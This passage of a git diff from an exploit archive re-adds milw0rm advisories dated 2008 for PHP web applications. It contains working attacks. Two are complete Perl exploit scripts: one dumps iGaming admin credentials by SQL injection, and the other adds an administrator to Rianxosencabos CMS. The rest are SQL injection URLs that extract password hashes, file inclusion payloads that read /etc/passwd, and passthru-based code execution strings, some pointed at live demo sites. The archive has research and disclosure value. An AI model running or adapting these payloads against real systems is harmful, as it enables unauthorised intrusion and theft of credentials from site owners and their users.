+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ #####################################################################
+ #  [ OpenRat <= 0.8-beta4 ]   Remote File Inclusion Vulnerability   #
+ #####################################################################
+ #
+ # Script: "OpenRat is a free Web Content-Management-System."
+ #
+ # Script site: http://www.openrat.de/
+ # Download: http://www.openrat.de/download/  
+ #           http://dl.openrat.de/openrat-cvs-2007-12-05.tar.gz
+ #
+ # Vuln: http://site.com/openrat/themes/default/include/html/insert.inc.php?tpl_dir=[spread???]
+ #      
+ #
+ # Bug: ./openrat/themes/default/include/html/insert.inc.php
+ #
+ # ...
+ # 	
+ # ... 	 
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-09-23]
diff --git a/platforms/php/webapps/6539.txt b/platforms/php/webapps/6539.txt
index 2fab83c05..9d7077f04 100755
--- a/platforms/php/webapps/6539.txt
+++ b/platforms/php/webapps/6539.txt
@@ -1,40 +1,39 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- #########################################################################
- #  [ Sofi WebGui <= 0.6.3 PRE ]   Remote File Inclusion Vulnerability   #
- #########################################################################
- #
- # Script site: http://www.muskatli.net/studio/hu/?f=sofi-wgui-hu
- # Download: http://www.muskatli.net/site/files/news_data/100004_100192_sofi_webgui_0.6.0.pre-release-3.tar.gz
- #
- # Vuln: http://site.com/sofi_webgui/hu/modules/reg-new/modstart.php?mod_dir=[spread???]
- #      
- #
- # Bug: ./sofi_webgui/hu/modules/reg-new/modstart.php (line: 26)
- #
- # ...
- # 	if($ff=="") $ff = "index";
- #	$file_name = "m_$ff.php";
- #
- #	//start web module
- #	include("$mod_dir/$file_name");		// RFI
- # ... 	 
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-09-23]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ #########################################################################
+ #  [ Sofi WebGui <= 0.6.3 PRE ]   Remote File Inclusion Vulnerability   #
+ #########################################################################
+ #
+ # Script site: http://www.muskatli.net/studio/hu/?f=sofi-wgui-hu
+ # Download: http://www.muskatli.net/site/files/news_data/100004_100192_sofi_webgui_0.6.0.pre-release-3.tar.gz
+ #
+ # Vuln: http://site.com/sofi_webgui/hu/modules/reg-new/modstart.php?mod_dir=[spread???]
+ #      
+ #
+ # Bug: ./sofi_webgui/hu/modules/reg-new/modstart.php (line: 26)
+ #
+ # ...
+ # 	if($ff=="") $ff = "index";
+ #	$file_name = "m_$ff.php";
+ #
+ #	//start web module
+ #	include("$mod_dir/$file_name");		// RFI
+ # ... 	 
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-09-23]
diff --git a/platforms/php/webapps/6540.pl b/platforms/php/webapps/6540.pl
index b9d65fa36..7945f186e 100755
--- a/platforms/php/webapps/6540.pl
+++ b/platforms/php/webapps/6540.pl
@@ -1,49 +1,49 @@
-#!/usr/bin/perl
-# ----------------------------------------------------------
-# iGaming <= 1.5 Multiple Remote SQL Injection Exploit
-# Perl Exploit - Output: id:admin:password
-# Discovered On: 23/09/2008
-# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
-# Proud To Be Italian 
-# ----------------------------------------------------------
-# Usage: perl exploit.pl http://localhost/iGaming
-# ----------------------------------------------------------
-
-use strict;
-use LWP::UserAgent;
-
-my ($one,$two,$exec,$host,$http,$xxx,$view);
-
-$view  = "'%20union%20select%200,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8%20from%20sp_members%20WHERE%20id='1/*";
-$exec  = "'%20union%20select%201,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3%20from%20sp_members%20where%20id='1/*";
-$host = shift @ARGV;
-$http = new LWP::UserAgent or die $!;
-$http->agent("Mozilla/4.5 [en] (Win95; U)");
-$http->timeout(1);
-                          
-
-if($host !~ /^http:\/\/(.+?)$/)
-{
-  print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploit\n";
-  print "[?] Usage: perl $0 http://[path]\n";
-  exit;
-}
-else
-{
-  $one = $http->get($host.'/previews.php?browse='.$exec);
-  $two = $http->get($host.'/reviews.php?browse='.$exec);
-  $xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view);
-  
-  if($one->is_success or $two->is_success or $xxx->is_success)
-  {
-    die "$1\n" if $one->content =~ /%(.+?)%/;
-    die "$1\n" if $two->content =~ /%(.+?)%/;
-    die "$1\n" if $xxx->content =~ /%(.+?)%/;
-  }
-  else
-  {
-    die "[+] Exploit Failed!\n";
-  }
-}  
-
-# milw0rm.com [2008-09-23]
+#!/usr/bin/perl
+# ----------------------------------------------------------
+# iGaming <= 1.5 Multiple Remote SQL Injection Exploit
+# Perl Exploit - Output: id:admin:password
+# Discovered On: 23/09/2008
+# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
+# Proud To Be Italian 
+# ----------------------------------------------------------
+# Usage: perl exploit.pl http://localhost/iGaming
+# ----------------------------------------------------------
+
+use strict;
+use LWP::UserAgent;
+
+my ($one,$two,$exec,$host,$http,$xxx,$view);
+
+$view  = "'%20union%20select%200,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8%20from%20sp_members%20WHERE%20id='1/*";
+$exec  = "'%20union%20select%201,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3%20from%20sp_members%20where%20id='1/*";
+$host = shift @ARGV;
+$http = new LWP::UserAgent or die $!;
+$http->agent("Mozilla/4.5 [en] (Win95; U)");
+$http->timeout(1);
+                          
+
+if($host !~ /^http:\/\/(.+?)$/)
+{
+  print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploit\n";
+  print "[?] Usage: perl $0 http://[path]\n";
+  exit;
+}
+else
+{
+  $one = $http->get($host.'/previews.php?browse='.$exec);
+  $two = $http->get($host.'/reviews.php?browse='.$exec);
+  $xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view);
+  
+  if($one->is_success or $two->is_success or $xxx->is_success)
+  {
+    die "$1\n" if $one->content =~ /%(.+?)%/;
+    die "$1\n" if $two->content =~ /%(.+?)%/;
+    die "$1\n" if $xxx->content =~ /%(.+?)%/;
+  }
+  else
+  {
+    die "[+] Exploit Failed!\n";
+  }
+}  
+
+# milw0rm.com [2008-09-23]
diff --git a/platforms/php/webapps/6541.txt b/platforms/php/webapps/6541.txt
index e25e6d787..79dc5d04b 100755
--- a/platforms/php/webapps/6541.txt
+++ b/platforms/php/webapps/6541.txt
@@ -1,24 +1,24 @@
-###################################################################################
-## Galmeta Post CMS <= 0.2 Remote Code Execution / Arbitrary File Upload
-## Script : http://downloads.sourceforge.net/galmetapost
-## You Can Get Multiple Local File Inclusion Vulnerabilities To This Script 
-## From Here http://www.milw0rm.com/exploits/5944 By CWH Underground
-###################################################################################
-###################################################################################
-###################################################################################
-## Vulns & POC :
-##  1- Remote Code Execution Vulnerability In \_lib\adodb_lite\adodb-perf-module.inc.php
-##  In Line 20 :
-##  eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
-##                    -----------------------------------
-##  Ex : /_lib/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//
-###################################################################################
-###################################################################################
-###################################################################################
-##  2- (FCKeditor) Remote Arbitrary File Upload In \_lib\fckeditor\editor\filemanager\upload\test.html
-##                    -----------------------------------
-##  Ex : /_lib/fckeditor/editor/filemanager/upload/test.html
-##  Restrict And Grant Only Trusted Users Access To The Resources.
-###################################################################################
-
-# milw0rm.com [2008-09-23]
+###################################################################################
+## Galmeta Post CMS <= 0.2 Remote Code Execution / Arbitrary File Upload
+## Script : http://downloads.sourceforge.net/galmetapost
+## You Can Get Multiple Local File Inclusion Vulnerabilities To This Script 
+## From Here http://www.milw0rm.com/exploits/5944 By CWH Underground
+###################################################################################
+###################################################################################
+###################################################################################
+## Vulns & POC :
+##  1- Remote Code Execution Vulnerability In \_lib\adodb_lite\adodb-perf-module.inc.php
+##  In Line 20 :
+##  eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
+##                    -----------------------------------
+##  Ex : /_lib/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//
+###################################################################################
+###################################################################################
+###################################################################################
+##  2- (FCKeditor) Remote Arbitrary File Upload In \_lib\fckeditor\editor\filemanager\upload\test.html
+##                    -----------------------------------
+##  Ex : /_lib/fckeditor/editor/filemanager/upload/test.html
+##  Restrict And Grant Only Trusted Users Access To The Resources.
+###################################################################################
+
+# milw0rm.com [2008-09-23]
diff --git a/platforms/php/webapps/6542.txt b/platforms/php/webapps/6542.txt
index e70bbf136..28ec83292 100755
--- a/platforms/php/webapps/6542.txt
+++ b/platforms/php/webapps/6542.txt
@@ -1,30 +1,30 @@
-[~]-----------------------------------------------------------
-[~] JETIK-WEB Software v1 - SQL Injection Vulnerability
-[~]
-[~] http://www.jetik.net
-[~] ----------------------------------------------------------
-[~] Bug founded by d3v1l
-[~]
-[~] Date: 22.09.2008
-[~]
-[~]
-[~] d3v1l@spoofer.com
-[~]
-[~] -----------------------------------------------------------
-[~] Greetz tO ALL:-
-[~]
-[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
-[~]
-[~] Pentest| Gibon| Pig       AND      milw0rm staff
-[~]-------------------------------------------------------------
-[~] Exploit :-
-[~]
-[~] http://site.com/sayfa.php?kat=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3/*
-[~]
-[~] Demo :-
-[~]
-[~] http://www.jetik.net/sayfa.php?kat=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3/*
-[~]
-[~]--------------------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-09-23]
+[~]-----------------------------------------------------------
+[~] JETIK-WEB Software v1 - SQL Injection Vulnerability
+[~]
+[~] http://www.jetik.net
+[~] ----------------------------------------------------------
+[~] Bug founded by d3v1l
+[~]
+[~] Date: 22.09.2008
+[~]
+[~]
+[~] d3v1l@spoofer.com
+[~]
+[~] -----------------------------------------------------------
+[~] Greetz tO ALL:-
+[~]
+[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
+[~]
+[~] Pentest| Gibon| Pig       AND      milw0rm staff
+[~]-------------------------------------------------------------
+[~] Exploit :-
+[~]
+[~] http://site.com/sayfa.php?kat=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3/*
+[~]
+[~] Demo :-
+[~]
+[~] http://www.jetik.net/sayfa.php?kat=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3/*
+[~]
+[~]--------------------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-09-23]
diff --git a/platforms/php/webapps/6543.txt b/platforms/php/webapps/6543.txt
index bf4d5cc79..6d2d6eab4 100755
--- a/platforms/php/webapps/6543.txt
+++ b/platforms/php/webapps/6543.txt
@@ -1,41 +1,40 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ####################################################################
- #  [ olbookmarks <= 0.7.5 ]   Local File Inclusion Vulnerability   #
- ####################################################################
- #
- # Script site: http://sourceforge.net/project/showfiles.php?group_id=24742
- #
- # Vuln: 
- # http://site.com/olbookmarks/show.php?show=../../../../../../../etc/passwd%00
- #      
- #
- # Bug: ./olbookmarks-0.7.5/show.php
- #
- # ...
- #	if ($_REQUEST[root] != "" || $_REQUEST[lib] != "") exit;
- #
- #	if ($_GET[show]!="")
- #		include("$root/$_GET[show].php");
- #	else
- #		include("$lib/bookmarkslist_view.php");
- # ... 			    
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-09-23]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ####################################################################
+ #  [ olbookmarks <= 0.7.5 ]   Local File Inclusion Vulnerability   #
+ ####################################################################
+ #
+ # Script site: http://sourceforge.net/project/showfiles.php?group_id=24742
+ #
+ # Vuln: 
+ # http://site.com/olbookmarks/show.php?show=../../../../../../../etc/passwd%00
+ #      
+ #
+ # Bug: ./olbookmarks-0.7.5/show.php
+ #
+ # ...
+ #	if ($_REQUEST[root] != "" || $_REQUEST[lib] != "") exit;
+ #
+ #	if ($_GET[show]!="")
+ #		include("$root/$_GET[show].php");
+ #	else
+ #		include("$lib/bookmarkslist_view.php");
+ # ... 			    
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-09-23]
diff --git a/platforms/php/webapps/6544.txt b/platforms/php/webapps/6544.txt
index 393654d1b..cfe5f918b 100755
--- a/platforms/php/webapps/6544.txt
+++ b/platforms/php/webapps/6544.txt
@@ -1,15 +1,15 @@
-WebPortal <= 0.7.4 (code) Remote Code Execution Vulnerability
-Download : http://webportal.ivanoculmine.com/download.php?mid=14
-Vuln :
-######################################################################
-        
-######################################################################
-POC :
-/index.php?m=admin&f=console&action=execute&code=(id);} passthru(id);
-######################################################################
-
-# milw0rm.com [2008-09-23]
+WebPortal <= 0.7.4 (code) Remote Code Execution Vulnerability
+Download : http://webportal.ivanoculmine.com/download.php?mid=14
+Vuln :
+######################################################################
+        
+######################################################################
+POC :
+/index.php?m=admin&f=console&action=execute&code=(id);} passthru(id);
+######################################################################
+
+# milw0rm.com [2008-09-23]
diff --git a/platforms/php/webapps/6545.txt b/platforms/php/webapps/6545.txt
index 93572f99c..d5679741a 100755
--- a/platforms/php/webapps/6545.txt
+++ b/platforms/php/webapps/6545.txt
@@ -1,66 +1,66 @@
-|___________________________________________________|
-|
-| Hotscripts Clone (cid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM |  WwW.TrYaG.CC
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script : http://www.greatclone.com/product_info.php?cPath=31&products_id=81
-|
-| DorK   : inurl:add_soft.php
-|___________________________________________________|
-
-
-sbwmd_config:username_len
-sbwmd_email_id:useremail
-sbwmd_mailing_list:username
-sbwmd_mailing_list:useremail
-sbwmd_members:username
-sbwmd_admin:pwd>freemagics
-sbwmd_config:pwd_len
-sbwmd_members:pwd
-sbwmd_admin:admin_name
-sbwmd_config:admin_email
-sbwmd_softwares:admin_desc
-
-
-
-
-
-www.[target].com/Script/showcategory.php?cid=-27+UNION+SELECT+1,concat(admin_name,0x3a,pwd),3,4,5,6+FROM+sbwmd_admin--
-
-
-OR
-
-
-www.[target].com/Script/showcategory.php?cid=-27+UNION+SELECT+1,concat(admin_name,0x3a,pwd),3,4,5+FROM+sbwmd_admin--
-
-
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
-|______________________________________________________________________
-
-
-                             Im IRAQi
-
-# milw0rm.com [2008-09-24]
+|___________________________________________________|
+|
+| Hotscripts Clone (cid) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM |  WwW.TrYaG.CC
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script : http://www.greatclone.com/product_info.php?cPath=31&products_id=81
+|
+| DorK   : inurl:add_soft.php
+|___________________________________________________|
+
+
+sbwmd_config:username_len
+sbwmd_email_id:useremail
+sbwmd_mailing_list:username
+sbwmd_mailing_list:useremail
+sbwmd_members:username
+sbwmd_admin:pwd>freemagics
+sbwmd_config:pwd_len
+sbwmd_members:pwd
+sbwmd_admin:admin_name
+sbwmd_config:admin_email
+sbwmd_softwares:admin_desc
+
+
+
+
+
+www.[target].com/Script/showcategory.php?cid=-27+UNION+SELECT+1,concat(admin_name,0x3a,pwd),3,4,5,6+FROM+sbwmd_admin--
+
+
+OR
+
+
+www.[target].com/Script/showcategory.php?cid=-27+UNION+SELECT+1,concat(admin_name,0x3a,pwd),3,4,5+FROM+sbwmd_admin--
+
+
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
+|______________________________________________________________________
+
+
+                             Im IRAQi
+
+# milw0rm.com [2008-09-24]
diff --git a/platforms/php/webapps/6546.pl b/platforms/php/webapps/6546.pl
index 4e2bcadd9..e6ccf8601 100755
--- a/platforms/php/webapps/6546.pl
+++ b/platforms/php/webapps/6546.pl
@@ -1,61 +1,61 @@
-#!/usr/bin/perl -w
-
-# Rianxosencabos CMS 0.9 Remote Add Admin Exploit
-# Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz
-
-# written by ka0x 
-# D.O.M Labs - Security Researchers
-# - www.domlabs.org -
-
-use LWP::UserAgent;
-
-my ($host, $login, $pass, $mail, $user_id) = @ARGV ;
-
-unless($ARGV[4]){
-	print "[*] usage: perl $0     \n";
-	print "[*] ex: perl $0 http://localhost/ ka0x 12345 ka0x01[at]gmail.com 2\n";
-	exit 1;
-}
-
-if ($host !~ /^http:/){ $host = 'http://'.$host; }
-
-my $ua = LWP::UserAgent->new() or die ;
-$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
-$ua->timeout(10) ;
-
-sub __CREATE {
-
-	my $req = HTTP::Request->new(POST => $host."index.php?s=usuarios&accion=registrar") ;
-	$req->content_type('application/x-www-form-urlencoded') ;
-	$req->content("reg_login=".$login."®_pass=".$pass."®_repass=".$pass."®_nombre=".$login."®_mail=".$mail."&submit_register=Rexistrar") ;
-
-	my $res = $ua->request($req) ;
-	my $location = $res->header('Location') ;
-	if ($location =~ /Usuario creado/i) {
-		print "[+] user added: ".$login ;
-		print "\n[+] password: ".$pass, "\n" ;
-	}
-
-	else{
-		print "[-] Exploit Failed!\n" ;
-	}
-}
-
-&__CREATE ;
-
-sub __ADMIN {
-	my $req = HTTP::Request->new(POST => $host."?s=admin&accion=lista") ;
-
-	$req->content_type('application/x-www-form-urlencoded') ;
-
-	$req->content($user_id."=0&inputOculto=".$user_id) ;
-
-	$ua->request($req) ;
-}
-
-&__ADMIN ;
-
-
-__END__
-
-# milw0rm.com [2008-09-24]
+#!/usr/bin/perl -w
+
+# Rianxosencabos CMS 0.9 Remote Add Admin Exploit
+# Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz
+
+# written by ka0x 
+# D.O.M Labs - Security Researchers
+# - www.domlabs.org -
+
+use LWP::UserAgent;
+
+my ($host, $login, $pass, $mail, $user_id) = @ARGV ;
+
+unless($ARGV[4]){
+	print "[*] usage: perl $0     \n";
+	print "[*] ex: perl $0 http://localhost/ ka0x 12345 ka0x01[at]gmail.com 2\n";
+	exit 1;
+}
+
+if ($host !~ /^http:/){ $host = 'http://'.$host; }
+
+my $ua = LWP::UserAgent->new() or die ;
+$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
+$ua->timeout(10) ;
+
+sub __CREATE {
+
+	my $req = HTTP::Request->new(POST => $host."index.php?s=usuarios&accion=registrar") ;
+	$req->content_type('application/x-www-form-urlencoded') ;
+	$req->content("reg_login=".$login."®_pass=".$pass."®_repass=".$pass."®_nombre=".$login."®_mail=".$mail."&submit_register=Rexistrar") ;
+
+	my $res = $ua->request($req) ;
+	my $location = $res->header('Location') ;
+	if ($location =~ /Usuario creado/i) {
+		print "[+] user added: ".$login ;
+		print "\n[+] password: ".$pass, "\n" ;
+	}
+
+	else{
+		print "[-] Exploit Failed!\n" ;
+	}
+}
+
+&__CREATE ;
+
+sub __ADMIN {
+	my $req = HTTP::Request->new(POST => $host."?s=admin&accion=lista") ;
+
+	$req->content_type('application/x-www-form-urlencoded') ;
+
+	$req->content($user_id."=0&inputOculto=".$user_id) ;
+
+	$ua->request($req) ;
+}
+
+&__ADMIN ;
+
+
+__END__
+
+# milw0rm.com [2008-09-24]
diff --git a/platforms/php/webapps/6547.txt b/platforms/php/webapps/6547.txt
index 8cbf6d1bf..c9bcba38e 100755
--- a/platforms/php/webapps/6547.txt
+++ b/platforms/php/webapps/6547.txt
@@ -1,20 +1,20 @@
-#########################################
-Ol Bookmarks Manager 0.7.5 RFI / LFI / SQL Injection Vulnerabilities
-#########################################
-POC & Vulns
-RFI In (frame.php) In Line 46
-	include "$_GET[framefile]";
-#########################################
-Ex : /frame.php?framefile=[Shell]
-#########################################
-LFI In (/read/frame.php) In Line 46
-	include "../$_GET[framefile]";
-#########################################
-Ex : /frame.php?framefile=../../../../../../etc/passwd
-#########################################
-SQL Injection In /read/index.php?name=brian&id=
-Ex : /read/index.php?name=brian&id=-0000008+union+select+1,2,3,4,password,login,7,8,9,10,12,11,13+from+preferences--
-#########################################
-Thanx To .. Tryag.cc/cc ..And.. All Members In TryaG 
-
-# milw0rm.com [2008-09-24]
+#########################################
+Ol Bookmarks Manager 0.7.5 RFI / LFI / SQL Injection Vulnerabilities
+#########################################
+POC & Vulns
+RFI In (frame.php) In Line 46
+	include "$_GET[framefile]";
+#########################################
+Ex : /frame.php?framefile=[Shell]
+#########################################
+LFI In (/read/frame.php) In Line 46
+	include "../$_GET[framefile]";
+#########################################
+Ex : /frame.php?framefile=../../../../../../etc/passwd
+#########################################
+SQL Injection In /read/index.php?name=brian&id=
+Ex : /read/index.php?name=brian&id=-0000008+union+select+1,2,3,4,password,login,7,8,9,10,12,11,13+from+preferences--
+#########################################
+Thanx To .. Tryag.cc/cc ..And.. All Members In TryaG 
+
+# milw0rm.com [2008-09-24]
diff --git a/platforms/php/webapps/6549.txt b/platforms/php/webapps/6549.txt
index c1c81c503..5319c1aa3 100755
--- a/platforms/php/webapps/6549.txt
+++ b/platforms/php/webapps/6549.txt
@@ -1,48 +1,48 @@
-[~] Jetik Emlak ESA 2.0 System Script
-[~]
-[~] (KayitNo) multiple remote sql inj
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 24.09.2008
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] contact: zorlu@w.cn
-[~] 
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] -----------------------------------------------------------
-
-Exploit:
-
-http://localhost/script_path/diger.php?KayitNo=[SQL]
-
-http://localhost/script_path/sayfalar.php?KayitNo=[SQL]
-
-[SQL]= 
-
--99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*
-
-Example:
-
-http://www.jetik.net/esa/diger.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*
-
-Example 2:
-
-http://www.jetik.net/esa/sayfalar.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*
-
-
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
-[~]
-[~] http://www.z0rlu.blogspot.com online : )
-[~]
-[~] home: yildirimordulari.org  &  r00tsecurity.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-09-24]
+[~] Jetik Emlak ESA 2.0 System Script
+[~]
+[~] (KayitNo) multiple remote sql inj
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 24.09.2008
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] contact: zorlu@w.cn
+[~] 
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] -----------------------------------------------------------
+
+Exploit:
+
+http://localhost/script_path/diger.php?KayitNo=[SQL]
+
+http://localhost/script_path/sayfalar.php?KayitNo=[SQL]
+
+[SQL]= 
+
+-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*
+
+Example:
+
+http://www.jetik.net/esa/diger.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*
+
+Example 2:
+
+http://www.jetik.net/esa/sayfalar.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*
+
+
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
+[~]
+[~] http://www.z0rlu.blogspot.com online : )
+[~]
+[~] home: yildirimordulari.org  &  r00tsecurity.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-09-24]
diff --git a/platforms/php/webapps/6551.txt b/platforms/php/webapps/6551.txt
index 7d9cf4983..c497d2377 100755
--- a/platforms/php/webapps/6551.txt
+++ b/platforms/php/webapps/6551.txt
@@ -1,51 +1,50 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ###############################################################
- #  [ emergecolab 1.0 ]   Local File Inclusion Vulnerability   #
- ###############################################################
- #
- # Script site: http://emerge2004.net/software.php 
- # Download: http://eduforge.org/projects/emergecolab/
- #
- # Vuln:
- # http://site.com/emerge-1.0/connect/index.php?sitecode=../../../../../../../etc/passwd%00
- #      
- #
- # Bug: ./emerge-1.0/connect/init.inc (lines: 23-30)
- #
- # ...
- # if (isset($_GET["sitecode"])) {
- # 	#first load the global settings
- #	include ("conf/global.conf");
- #	#echo "got get var";
- #	$_SESSION["sitecode"]=$_GET["sitecode"];
- #	#set the session variable with the site folder for now just to default
- #	$_SESSION['sitefolder']='site';
- #	include ("conf/".strtolower($_GET["sitecode"]).".conf"); 	// LFI
- # ...
- #
- #
- # Bug: (for example) ./emerge-1.0/connect/index.php (line: 2)
- #
- # ...
- # require ("init.inc");
- # ...
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-09-24]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ###############################################################
+ #  [ emergecolab 1.0 ]   Local File Inclusion Vulnerability   #
+ ###############################################################
+ #
+ # Script site: http://emerge2004.net/software.php 
+ # Download: http://eduforge.org/projects/emergecolab/
+ #
+ # Vuln:
+ # http://site.com/emerge-1.0/connect/index.php?sitecode=../../../../../../../etc/passwd%00
+ #      
+ #
+ # Bug: ./emerge-1.0/connect/init.inc (lines: 23-30)
+ #
+ # ...
+ # if (isset($_GET["sitecode"])) {
+ # 	#first load the global settings
+ #	include ("conf/global.conf");
+ #	#echo "got get var";
+ #	$_SESSION["sitecode"]=$_GET["sitecode"];
+ #	#set the session variable with the site folder for now just to default
+ #	$_SESSION['sitefolder']='site';
+ #	include ("conf/".strtolower($_GET["sitecode"]).".conf"); 	// LFI
+ # ...
+ #
+ #
